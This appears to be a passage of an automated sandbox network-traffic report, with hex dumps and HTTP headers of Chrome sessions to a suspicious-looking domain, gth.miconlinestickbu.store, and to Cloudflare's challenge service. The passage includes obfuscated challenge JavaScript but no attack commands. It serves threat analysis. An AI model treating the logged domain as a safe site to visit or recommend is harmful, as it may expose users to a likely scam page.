                                    2024-05-22 15:09:01 UTC1369INData Raw: 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67
                                    Data Ascii: .size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-alig
                                    2024-05-22 15:09:01 UTC1369INData Raw: 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69
                                    Data Ascii: t: 0; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .si


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.449780104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:01 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:01 UTC718INHTTP/1.1 404 Not Found
                                    Date: Wed, 22 May 2024 15:09:01 GMT
                                    Content-Type: application/json
                                    Content-Length: 7
                                    Connection: close
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    cf-chl-out: RWt2qZVk0h6ezYHtIt98iw==$reBoh9UpakQ4wt1GrQD76Q==
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XhwEhYTxMvsDY35X5QZTkQWLMJ9FuNau1Y3uvFo1auFMFx8%2BMI10Yy5zjtoritLWg1E8O1YOgGjjGOrORADfPAfryZSVp8KYP%2F1PxSn5x0%2FHYuKlD04MGzWqGVUkYUjQrHA5bECZKc0Hb1Rzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887db9963f7a7c88-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                    Data Ascii: invalid


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.449782104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:03 UTC711OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887db996294478e1 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:03 UTC331INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:03 GMT
                                    Content-Type: application/javascript; charset=UTF-8
                                    Content-Length: 445069
                                    Connection: close
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Server: cloudflare
                                    CF-RAY: 887db99e6a490f89-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:03 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 48 2c 66 4f 2c 66 53 2c 66 54 2c 66 55 2c 66 59 2c 66 5a 2c 67 36 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 35 2c 68 68 2c 68 75 2c
                                    Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fH,fO,fS,fT,fU,fY,fZ,g6,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h5,hh,hu,
                                    2024-05-22 15:09:03 UTC1369INData Raw: 20 68 3c 3c 69 7d 2c 27 64 4c 4d 71 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 58 42 56 69 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 76 59 75 69 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 41 46 63 45 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 62 6d 76 70 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 66 72 78 45 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6f 41 6d 6c 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 52 59 4e 4f 41 27
                                    Data Ascii: h<<i},'dLMqv':function(h,i){return i==h},'XBVik':function(h,i){return h-i},'vYuig':function(h,i){return h(i)},'AFcEv':function(h,i){return h==i},'bmvpA':function(h,i){return h>i},'frxEU':function(h,i){return h&i},'oAmli':function(h,i){return h-i},'RYNOA'
                                    2024-05-22 15:09:03 UTC1369INData Raw: 28 69 5b 69 44 28 31 30 37 37 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 42 2c 69 45 29 7b 69 45 3d 69 44 2c 42 5b 69 45 28 35 35 39 29 5d 28 6c 5b 69 45 28 31 33 35 30 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 69 46 2c 47 29 7b 28 69 46 3d 69 45 2c 42 5b 6f 5b 69 46 28 34 33 30 29 5d 5d 29 26 26 28 47 3d 7b 7d 2c 47 5b 69 46 28 31 39 30 38 29 5d 3d 6f 5b 69 46 28 31 34 37 38 29 5d 2c 47 5b 69 46 28 31 36 31 34 29 5d 3d 45 5b 69 46 28 33 34 31 32 29 5d 5b 69 46 28 31 30 35 37 29 5d 2c 47 5b 69 46 28 32 37 34 38 29 5d 3d 69 46 28 31 36 38 33 29 2c 44 5b 69 46 28 34 34 36 29 5d 5b 69 46 28 32 30 35 39 29 5d 28 47 2c 27 2a 27 29 29 7d 29 7d 29 2c 69 5b 69 44 28 32 33 32 37 29 5d 28 6d 29 2c 6e 28 69 44 28 38 34 34 29 2c 69 44 28 31 36 32 30 29 29 7d 29 7d 2c 27 67 27 3a
                                    Data Ascii: (i[iD(1077)],function(B,iE){iE=iD,B[iE(559)](l[iE(1350)],function(iF,G){(iF=iE,B[o[iF(430)]])&&(G={},G[iF(1908)]=o[iF(1478)],G[iF(1614)]=E[iF(3412)][iF(1057)],G[iF(2748)]=iF(1683),D[iF(446)][iF(2059)](G,'*'))})}),i[iD(2327)](m),n(iD(844),iD(1620))})},'g':
                                    2024-05-22 15:09:03 UTC1369INData Raw: 28 64 5b 69 48 28 31 38 36 30 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 4e 2c 64 5b 69 48 28 36 31 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 48 28 31 38 34 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 48 28 32 39 32 34 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 69 48 28 31 39 37 35 29 5d 28 31 36 2c 78 29 3b 49 3d 49 3c 3c 31 2e 35 38 7c 64 5b 69 48 28 32 36 37 31 29 5d 28 4e 2c 31 29 2c 64 5b 69 48 28 36 31 33 29 5d 28 4a 2c 64 5b 69 48 28 34 34 39 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 48 28 31 38 34 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30
                                    Data Ascii: (d[iH(1860)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=I<<1|N,d[iH(613)](J,j-1)?(J=0,H[iH(1845)](o(I)),I=0):J++,N=0,x++);for(N=D[iH(2924)](0),x=0;d[iH(1975)](16,x);I=I<<1.58|d[iH(2671)](N,1),d[iH(613)](J,d[iH(449)](j,1))?(J=0,H[iH(1845)](o(I)),I=0
                                    2024-05-22 15:09:03 UTC1369INData Raw: 48 28 33 34 31 32 29 5d 5b 69 48 28 31 38 38 34 29 5d 2e 72 61 7d 2c 27 2a 27 29 3b 45 2d 2d 2c 64 5b 69 48 28 36 31 33 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 69 48 28 31 39 30 33 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 48 28 31 37 39 30 29 5d 28 49 2c 31 29 7c 4e 26 31 2c 64 5b 69 48 28 36 31 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 48 28 31 38 34 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 45 2d 2d 2c 64 5b 69 48 28 36 31 33 29 5d 28 30 2c 45 29 26 26 47 2b 2b 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 48 28 32 39 34 34 29 5d 28 49 2c 31
                                    Data Ascii: H(3412)][iH(1884)].ra},'*');E--,d[iH(613)](0,E)&&(E=Math[iH(1903)](2,G),G++),delete C[D]}else for(N=B[D],x=0;x<G;I=d[iH(1790)](I,1)|N&1,d[iH(613)](J,j-1)?(J=0,H[iH(1845)](o(I)),I=0):J++,N>>=1,x++);E--,d[iH(613)](0,E)&&G++}for(N=2,x=0;x<G;I=d[iH(2944)](I,1
                                    2024-05-22 15:09:03 UTC1369INData Raw: 2c 4b 3d 4d 61 74 68 5b 69 4d 28 31 39 30 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 69 4d 28 31 34 36 31 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 69 4d 28 36 31 33 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 4d 28 31 32 32 30 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 4d 28 31 36 38 36 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 4d 28 31 39 30 33 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 69 4d 28 35 34 34 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c
                                    Data Ascii: ,K=Math[iM(1903)](2,8),F=1;K!=F;L=d[iM(1461)](G,H),H>>=1,d[iM(613)](0,H)&&(H=j,G=d[iM(1220)](o,I++)),J|=d[iM(1686)](0<L?1:0,F),F<<=1);M=e(J);break;case 1:for(J=0,K=Math[iM(1903)](2,16),F=1;d[iM(544)](F,K);L=H&G,H>>=1,0==H&&(H=j,G=o(I++)),J|=F*(0<L?1:0),F<
                                    2024-05-22 15:09:03 UTC1369INData Raw: 6d 28 39 31 32 29 5d 28 68 5b 6a 6d 28 32 32 30 38 29 5d 28 66 46 5b 6a 6d 28 33 34 31 32 29 5d 5b 6a 6d 28 32 31 32 39 29 5d 2c 27 5f 27 29 2c 30 29 2c 6c 3d 6c 5b 6a 6d 28 31 33 37 35 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 6a 6e 29 7b 69 66 28 6a 6e 3d 6a 6d 2c 6a 6e 28 33 32 33 31 29 21 3d 3d 6a 6e 28 33 32 33 31 29 29 72 65 74 75 72 6e 21 5b 5d 3b 65 6c 73 65 20 6a 5e 3d 6c 5b 6a 6e 28 32 39 32 34 29 5d 28 73 29 7d 29 2c 66 3d 66 46 5b 6a 6d 28 32 39 31 38 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 6a 6d 28 32 39 32 34 29 5d 28 2b 2b 69 29 29 3b 6b 5b 6a 6d 28 31 38 34 35 29 5d 28 53 74 72 69 6e 67 5b 6a 6d 28 32 33 38 33 29 5d 28 28 68 5b 6a 6d 28 38 38 39 29 5d 28 6d 26 32 35 35 2c 6a 29
                                    Data Ascii: m(912)](h[jm(2208)](fF[jm(3412)][jm(2129)],'_'),0),l=l[jm(1375)](/./g,function(n,s,jn){if(jn=jm,jn(3231)!==jn(3231))return![];else j^=l[jn(2924)](s)}),f=fF[jm(2918)](f),k=[],i=-1;!isNaN(m=f[jm(2924)](++i));k[jm(1845)](String[jm(2383)]((h[jm(889)](m&255,j)
                                    2024-05-22 15:09:03 UTC1369INData Raw: 29 5d 28 27 3b 27 29 2c 66 5a 3d 66 59 5b 69 7a 28 31 33 39 34 29 5d 5b 69 7a 28 38 31 31 29 5d 28 66 59 29 2c 66 46 5b 69 7a 28 38 36 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 6a 75 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 6a 75 3d 69 7a 2c 69 3d 7b 27 79 4a 45 6d 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 62 79 50 65 79 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 50 48 75 71 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 21 3d 3d 6f 7d 2c 27 42 6b 61 55 51 27 3a 6a 75 28 35 37 38 29 2c 27 4b 73 44 7a 79 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 48 77 51 74 55 27 3a 66 75
                                    Data Ascii: )](';'),fZ=fY[iz(1394)][iz(811)](fY),fF[iz(868)]=function(g,h,ju,i,j,k,l,m){for(ju=iz,i={'yJEmx':function(n,o){return n+o},'byPey':function(n,o){return n<o},'PHuqC':function(n,o){return n!==o},'BkaUQ':ju(578),'KsDzy':function(n,o){return o===n},'HwQtU':fu
                                    2024-05-22 15:09:03 UTC1369INData Raw: 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 50 28 32 31 36 35 29 5d 3d 6a 50 28 31 37 30 35 29 2c 69 5b 6a 50 28 33 31 37 36 29 5d 3d 6a 50 28 32 30 34 38 29 2c 69 5b 6a 50 28 31 39 38 35 29 5d 3d 6a 50 28 32 38 33 37 29 2c 69 29 3b 74 72 79 7b 69 66 28 6b 3d 68 7c 7c 6a 50 28 32 31 32 35 29 2c 6c 3d 66 46 5b 6a 50 28 33 34 31 32 29 5d 5b 6a 50 28 38 39 33 29 5d 3f 27 68 2f 27 2b 66 46 5b 6a 50 28 33 34 31 32 29 5d 5b 6a 50 28 38 39 33 29 5d 2b 27 2f 27 3a 27 27 2c 6d 3d 6a 5b 6a 50 28 33 30 39 38 29 5d 28 6a 5b 6a 50 28 33 30 39 38 29 5d 28 6a 50 28 31 32 35 36 29 2b 6c 2b 6a 50 28 33 32 33 36 29 2b 31 2c 6a 5b 6a 50 28 32 31 36 35 29 5d 29 2b 66 46 5b 6a 50 28 33 34 31 32 29 5d 5b 6a 50 28 32 31 32 39 29 5d 2b 27 2f 27 2b 66 46 5b 6a 50 28 33 34 31 32 29 5d 5b
                                    Data Ascii: urn C+D},i[jP(2165)]=jP(1705),i[jP(3176)]=jP(2048),i[jP(1985)]=jP(2837),i);try{if(k=h||jP(2125),l=fF[jP(3412)][jP(893)]?'h/'+fF[jP(3412)][jP(893)]+'/':'',m=j[jP(3098)](j[jP(3098)](jP(1256)+l+jP(3236)+1,j[jP(2165)])+fF[jP(3412)][jP(2129)]+'/'+fF[jP(3412)][
                                    2024-05-22 15:09:03 UTC1369INData Raw: 28 32 35 30 32 29 5d 3d 69 7a 28 31 38 35 35 29 2c 67 38 5b 69 7a 28 32 36 30 31 29 5d 3d 69 7a 28 32 30 37 33 29 2c 67 38 5b 69 7a 28 31 31 30 36 29 5d 3d 69 7a 28 32 36 33 34 29 2c 67 38 5b 69 7a 28 31 30 32 30 29 5d 3d 69 7a 28 32 36 35 33 29 2c 67 38 5b 69 7a 28 37 30 33 29 5d 3d 69 7a 28 36 36 39 29 2c 67 38 5b 69 7a 28 32 31 36 34 29 5d 3d 69 7a 28 31 37 32 32 29 2c 67 38 5b 69 7a 28 32 31 39 36 29 5d 3d 69 7a 28 31 30 38 39 29 2c 67 38 5b 69 7a 28 31 32 37 34 29 5d 3d 69 7a 28 32 39 36 37 29 2c 67 38 5b 69 7a 28 31 34 38 32 29 5d 3d 69 7a 28 39 35 35 29 2c 67 38 5b 69 7a 28 33 31 30 32 29 5d 3d 69 7a 28 35 36 34 29 2c 67 38 5b 69 7a 28 38 31 38 29 5d 3d 69 7a 28 33 32 35 33 29 2c 67 38 5b 69 7a 28 32 38 39 39 29 5d 3d 69 7a 28 38 38 34 29 2c 67 38
                                    Data Ascii: (2502)]=iz(1855),g8[iz(2601)]=iz(2073),g8[iz(1106)]=iz(2634),g8[iz(1020)]=iz(2653),g8[iz(703)]=iz(669),g8[iz(2164)]=iz(1722),g8[iz(2196)]=iz(1089),g8[iz(1274)]=iz(2967),g8[iz(1482)]=iz(955),g8[iz(3102)]=iz(564),g8[iz(818)]=iz(3253),g8[iz(2899)]=iz(884),g8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.449781104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:03 UTC786OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:03 UTC240INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:03 GMT
                                    Content-Type: image/png
                                    Content-Length: 61
                                    Connection: close
                                    cache-control: max-age=2629800, public
                                    Server: cloudflare
                                    CF-RAY: 887db99f6b7542b2-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.449784104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:05 UTC880OUTGET /favicon.ico HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:05 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16517
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:05 UTC753INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 68 74 54 38 76 45 46 34 6d 47 76 70 4d 48 42 44 45 32 51 44 7a 48 48 65 7a 76 66 43 7a 56 4b 51 64 6c 37 49 53 61 72 43 72 4d 4e 75 43 5a 54 56 42 57 4b 45 5a 59 54 37 57 34 6f 56 53 64 63 57 6d 71 74 50 55 54 79 6a 73 66 2b 75 6b 33 71 6a 75 77 33 6d 69 6d 47 54 32 54 4f 6e 64 64 34 39 49 76 33 73 69 48 4a 43 4a 66 36 43 79 4f 67 56 49 64 52 42 59 64 38 62 78 6a 65 6d 4e 71 6b 70 4a 4f 71 32 45 77 69 70 78 4c 7a 39 41 69 50 37 72 69 41 35 46 41 3d 3d 24 32 4f 52 30 4a 4e 5a 6b 30 58 61 55 53 30 2b 42 61 61 4f 59 54 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: htT8vEF4mGvpMHBDE2QDzHHezvfCzVKQdl7ISarCrMNuCZTVBWKEZYT7W4oVSdcWmqtPUTyjsf+uk3qjuw3mimGT2TOndd49Iv3siHJCJf6CyOgVIdRBYd8bxjemNqkpJOq2EwipxLz9AiP7riA5FA==$2OR0JNZk0XaUS0+BaaOYTg==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
